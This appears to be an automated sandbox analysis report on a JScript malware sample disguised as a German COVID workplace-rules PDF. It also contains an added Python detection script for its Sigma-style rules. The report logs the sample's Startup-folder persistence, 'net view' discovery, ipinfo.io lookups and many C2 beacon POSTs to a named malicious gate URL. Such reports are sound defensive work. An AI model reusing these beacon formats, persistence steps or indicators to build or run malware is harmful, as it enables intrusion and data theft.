
Analysis Report Arbeitsschutzregel-Corona-September.pdf.js

Overview

General Information

Sample Name:Arbeitsschutzregel-Corona-September.pdf.js
Analysis ID:284440
MD5:cbb53b682fbddca875973ea4f826a1df
SHA1:56eb48fdb6084855df9e111f481b88f1ccffbd1e
SHA256:8e9a1693a52155ce2aa8758413e594128e3b5f3b9fb18ef2a1e4084156817443

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Drops script or batch files to the startup folder
Found C&C like URL pattern
May check the online IP address of the machine
Opens network shares
Performs a network lookup / discovery via net view
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses an obfuscated file name to hide its real file extension (double extension)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication

Startup

  • System is w10x64
  • wscript.exe (PID: 6744 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6960 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 7060 cmdline: net view MD5: 15534275EDAABC58159DD0F8607A71E5)
  • wscript.exe (PID: 6672 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6064 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radDC873.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 6732 cmdline: net view MD5: 15534275EDAABC58159DD0F8607A71E5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location
Source: File created. Author: Joe Security. Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6744, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Sigma detected: Net.exe Execution
Source: Process started. Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements). Data: Command: net view, CommandLine: net view, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6960, ProcessCommandLine: net view, ProcessId: 7060
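The two Sigma hits above describe the same behaviour from two angles: the script host writes a copy of itself into the per-user Startup folder (Sysmon EventID 11), and a cmd.exe spawned by that script host runs net view. The following is an added example, not part of the Joe Sandbox report, that replays both checks in Python over Sysmon-style events. The event records are constructed from the process tree and Sigma data in this report (PIDs 6744, 6960 and 7060); the parent PID 1234, the benign control chain (PIDs 3000, 4000, 4001), the ancestry depth bound and the script extension list are the example's own assumptions.

```python
"""
Added example (not from the Joe Sandbox report): replay the two Sigma-style
detections from this report against constructed Sysmon-style events.

Rule A: a Windows script host (wscript.exe / cscript.exe) creates a script file
        in a per-user Startup folder (Sysmon EventID 11).
Rule B: net.exe running "net view" whose process ancestry contains a script
        host (Sysmon EventID 1), i.e. the wscript -> cmd -> net chain above.
Field names follow Sysmon (Image, ParentImage, TargetFilename, ...).
"""
import ntpath
from typing import Dict, Iterable, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Extension list is an assumption; extend it to whatever your environment allows to run.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".bat", ".cmd", ".ps1", ".hta"}
STARTUP_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"


def base(image: str) -> str:
    """Lower-cased file name of an image path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(image).lower()


def startup_script_drop(ev: Dict) -> bool:
    """Rule A: script host writes a script file into a Startup folder."""
    if ev.get("EventID") != 11:
        return False
    target = ev.get("TargetFilename", "").lower()
    ext = ntpath.splitext(target)[1]
    return (base(ev.get("Image", "")) in SCRIPT_HOSTS
            and STARTUP_MARKER in target
            and ext in SCRIPT_EXTS)


def net_view_from_script_host(ev: Dict, by_pid: Dict[int, Dict]) -> bool:
    """Rule B: 'net view' with a script host somewhere in its ancestry."""
    if ev.get("EventID") != 1 or base(ev.get("Image", "")) != "net.exe":
        return False
    args = ev.get("CommandLine", "").lower().split()
    if len(args) < 2 or args[1] != "view":
        return False
    pid = ev.get("ParentProcessId")
    for _ in range(8):  # bounded walk up the parent chain (depth 8 is an assumption)
        parent = by_pid.get(pid)
        if parent is None:
            return False
        if base(parent.get("Image", "")) in SCRIPT_HOSTS:
            return True
        pid = parent.get("ParentProcessId")
    return False


def detect(events: Iterable[Dict]) -> List[str]:
    """Run both rules over an event list; returns one string per hit."""
    events = list(events)
    by_pid = {e["ProcessId"]: e for e in events if e.get("EventID") == 1}
    hits = []
    for e in events:
        if startup_script_drop(e):
            hits.append(f"startup_script_drop pid={e['ProcessId']} file={e['TargetFilename']}")
        if net_view_from_script_host(e, by_pid):
            hits.append(f"net_view_from_script_host pid={e['ProcessId']}")
    return hits


# Constructed events mirroring the report's process tree (malicious chain), plus
# a constructed benign control: an interactive cmd.exe running net view.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 6744, "ParentProcessId": 1234,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js"'},
    {"EventID": 11, "ProcessId": 6744, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js"},
    {"EventID": 1, "ProcessId": 6960, "ParentProcessId": 6744,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /C net view > "C:\Users\user\AppData\Local\Temp\rad17A1B.tmp"'},
    {"EventID": 1, "ProcessId": 7060, "ParentProcessId": 6960,
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net view"},
    {"EventID": 1, "ProcessId": 4000, "ParentProcessId": 3000,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessId": 4001, "ParentProcessId": 4000,
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net view"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Rule B walks the parent chain rather than matching only the direct parent, because the report shows net.exe two hops away from wscript.exe (cmd.exe sits in between); the benign control chain produces no hit because its ancestry never reaches a script host.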

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Arbeitsschutzregel-Corona-September.pdf.js, Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js, Avira: detection malicious, Label: JS/FileCoder.AI
Multi AV Scanner detection for domain / URL
Source: doamvola.top, Virustotal: Detection: 6%
Source: http://doamvola.top/gate.php, Virustotal: Detection: 6%
Source: http://doamvola.top/, Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: Arbeitsschutzregel-Corona-September.pdf.js, Virustotal: Detection: 40%
Source: Arbeitsschutzregel-Corona-September.pdf.js, ReversingLabs: Detection: 24%

Spreading:

Performs a network lookup / discovery via net view
Source: unknown, Process created: C:\Windows\System32\net.exe net view
Source: unknown, Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Networking:

Found C&C like URL pattern
Source: global traffic, HTTP traffic detected. Two request types to the same host, repeated throughout the capture (91 requests in total): an "info" POST carrying a 342-byte JSON body and an empty "knock" POST. Both reconstructed from the captured headers:

POST /gate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
mode: info
uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED
version: Scoodle
Content-Length: 342
Host: doamvola.top

POST /gate.php HTTP/1.1
Connection: Keep-Alive
Accept: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
mode: knock
uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED
version: Scoodle
Content-Length: 0
Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
May check the online IP address of the machine
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: Joe Sandbox View | IP Address: 216.239.34.21
Source: Joe Sandbox View | IP Address: 151.101.0.133
Source: Joe Sandbox View | IP Address: 216.239.36.21
Source: Joe Sandbox View | ASN Name: SELECTELRU
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
